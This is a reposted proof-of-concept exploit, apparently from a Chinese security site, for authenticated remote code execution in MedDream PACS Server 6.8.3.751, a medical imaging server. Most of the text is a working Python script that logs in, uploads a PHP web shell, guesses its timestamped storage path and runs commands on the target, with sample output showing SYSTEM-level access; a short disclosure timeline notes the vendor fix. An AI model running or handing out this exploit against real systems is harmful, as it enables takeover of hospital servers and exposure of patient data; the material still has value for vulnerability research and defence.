MedDream PACS Server 6.8.3.751-远程代码执行

MedDream PACS Server 6.8.3.751-远程代码执行(已验证)
#日期:2020-10-01
#易受攻击的软件:https://www.softeta.com/products/meddream-pacs-server/
#供应商主页:https://www.softeta.com
#版本:6.8.3.751
#测试:Windows 2016
#时间轴
#05-02-20:通过电子邮件提交事件,立即回复
#05-04-20:问题已解决,新版本发布6.8.3.1.751
#注意:核心漏洞存在于另一个已修复的产品中
#PoC#
#
#1。创建一行php shell来调用命令
#2。在攻击机器上运行脚本
#3。输入参数;IP、文件名、用户名、密码、命令

# root@kali:~# python meddream.py
# Enter IP Address: 192.168.0.223
# Enter payload filename + .php: cmd.php
# Enter Username: user1
# Enter Password: SoSecure!!
# Enter command: whoami
# 212357
# <pre>nt authority\system
# </pre>
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
# 404
#
#
import getpass
import os
import sys
import time
from datetime import datetime, timedelta
from urllib2 import urlopen

import requests
from bs4 import BeautifulSoup
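# Interactive parameters. As in the original PoC these are read at module
# scope, so the file cannot be imported without answering the prompts.
ip_addr = raw_input("Enter IP Address: ").strip()
user_file = raw_input("Enter payload filename + .php: ").strip()
uname = raw_input("Enter Username: ")
# getpass does not echo the password, so it is not left on screen, in
# terminal scroll-back or in a session recording.
pword = getpass.getpass("Enter Password: ")
cmd = raw_input("Enter command: ")
# Plain HTTP: the credentials and the command output cross the wire in clear
# text. The PoC was verified over http://; adjust the scheme if the target
# front-end only answers on TLS.
URL1 = 'http://' + ip_addr + '/Pacs/login.php'         # login form, scraped for hidden fields
URL2 = 'http://' + ip_addr + '/Pacs/authenticate.php'  # credentials are posted here
URL3 = 'http://' + ip_addr + '/Pacs/uploadImage.php'   # multipart upload endpoint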
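# Per-request timeout (seconds) so a silent target cannot hang the script.
_TIMEOUT = 15


def _login(session):
    """Authenticate *session* against the MedDream web UI.

    Fetches the login page to scrape the hidden anti-spam token and AE title,
    then posts them together with the credentials from module scope to
    authenticate.php. Returns the authenticate.php response.

    A 2xx from authenticate.php does not by itself prove the credentials
    were accepted; the PoC gives no indicator for a failed login.

    Raises:
        RuntimeError: if the login page lacks the expected hidden inputs.
        requests.HTTPError: on a non-2xx response from either endpoint.
    """
    page = session.get(URL1, timeout=_TIMEOUT)
    page.raise_for_status()
    soup = BeautifulSoup(page.content, "html.parser")
    antispam_input = soup.find("input", {"name": "formAntiSpam"})
    aetitle_input = soup.find("input", {"name": "aetitle"})
    if antispam_input is None or aetitle_input is None:
        raise RuntimeError(
            "login page at %s lacks the formAntiSpam/aetitle inputs; "
            "is this a MedDream PACS login form?" % URL1)
    login_data = {
        'loginvalue': 'login',
        'aetitle': aetitle_input["value"],
        'username': uname,
        'password': pword,
        # NOTE(review): the scraped input is named "formAntiSpam" but the
        # value is posted as "formAntispam" (lower-case s), exactly as in the
        # original PoC. PHP $_POST keys are case-sensitive, so either the
        # server never checks the token or this is the name it expects --
        # kept unchanged; confirm against the real form before "fixing".
        'formAntispam': antispam_input["value"],
        'login': 'Login',
    }
    resp = session.post(URL2, data=login_data, timeout=_TIMEOUT)
    resp.raise_for_status()
    return resp


def _upload(session, path):
    """Upload the PHP payload at *path* through uploadImage.php.

    Only the basename is sent as the multipart filename, because the server
    reuses that name when it stores the file (see _candidate_urls). Returns
    the local wall-clock time right after the response arrived; the server
    stamps the stored file with its own clock, so this is only a seed for
    the timestamp search.

    Raises:
        IOError/OSError: if *path* cannot be opened.
        requests.HTTPError: on a non-2xx upload response.
    """
    with open(path, 'rb') as fh:
        files = [
            ('actionvalue', (None, 'Attach', None)),
            ('uploadfile', (os.path.basename(path), fh, 'application/x-php')),
            ('action', (None, 'Attach', None)),
        ]
        resp = session.post(URL3, files=files, timeout=_TIMEOUT)
    resp.raise_for_status()
    return datetime.now()


def _candidate_urls(host, base_time, filename, before=6, after=3):
    """Return the upload URLs to probe for *filename*, most likely first.

    The server stores the upload as
    http://<host>/Pacs/upload/<YYYYmmdd>-<HHMMSS>--<filename>, stamped with
    *its* clock. We try *base_time* itself, then 1..*before* seconds earlier
    (the file was written before the response came back), then 1..*after*
    seconds later (clock skew). The date is taken from each candidate time,
    so an upload that straddles midnight is still found.
    """
    offsets = [0]
    offsets += [-s for s in range(1, before + 1)]
    offsets += list(range(1, after + 1))
    urls = []
    for off in offsets:
        stamp = (base_time + timedelta(seconds=off)).strftime("%Y%m%d-%H%M%S")
        urls.append('http://' + host + '/Pacs/upload/' + stamp + "--" + filename)
    return urls


def main():
    """Log in, upload the PHP payload and run *cmd* through it.

    Reads ip_addr, user_file, uname, pword and cmd from module scope. Prints
    the local upload time, then the body and URL of the first candidate that
    answers 200 and stops; otherwise prints the status code of every probe.

    The original PoC built the +1/+2/+3 s candidates from the wrong
    datetime objects (two of them were duplicates), so only a narrower
    window than intended was actually searched; the offsets are now
    generated from one list.

    Only run this against systems you are explicitly authorized to test.
    """
    session = requests.Session()
    _login(session)
    uploaded_at = _upload(session, user_file)
    # Local clock; the server's clock may differ, hence the search window.
    print(uploaded_at.strftime("%H%M%S"))
    name = os.path.basename(user_file)
    for url in _candidate_urls(ip_addr, uploaded_at, name):
        # params= URL-encodes the command, so '&', '#' or spaces in it cannot
        # corrupt the query string the way raw concatenation would.
        resp = session.get(url, params={'cmd': cmd}, timeout=_TIMEOUT)
        if resp.status_code == 200:
            print(resp.text)
            print(resp.url)
            return
        print(resp.status_code)
    print("payload not found at any candidate URL; the server clock may be "
          "further from local time than the search window covers")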
# Script entry point; main() returns None, so the process exits with 0.
if __name__ == "__main__":
    sys.exit(main())

网站地址:https://www.hackzl.cn;发布者:hack之路,转载请注明出处:https://www.hackzl.cn/index.php/2020/10/08/meddream-pacs-server-6-8-3-751-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7/
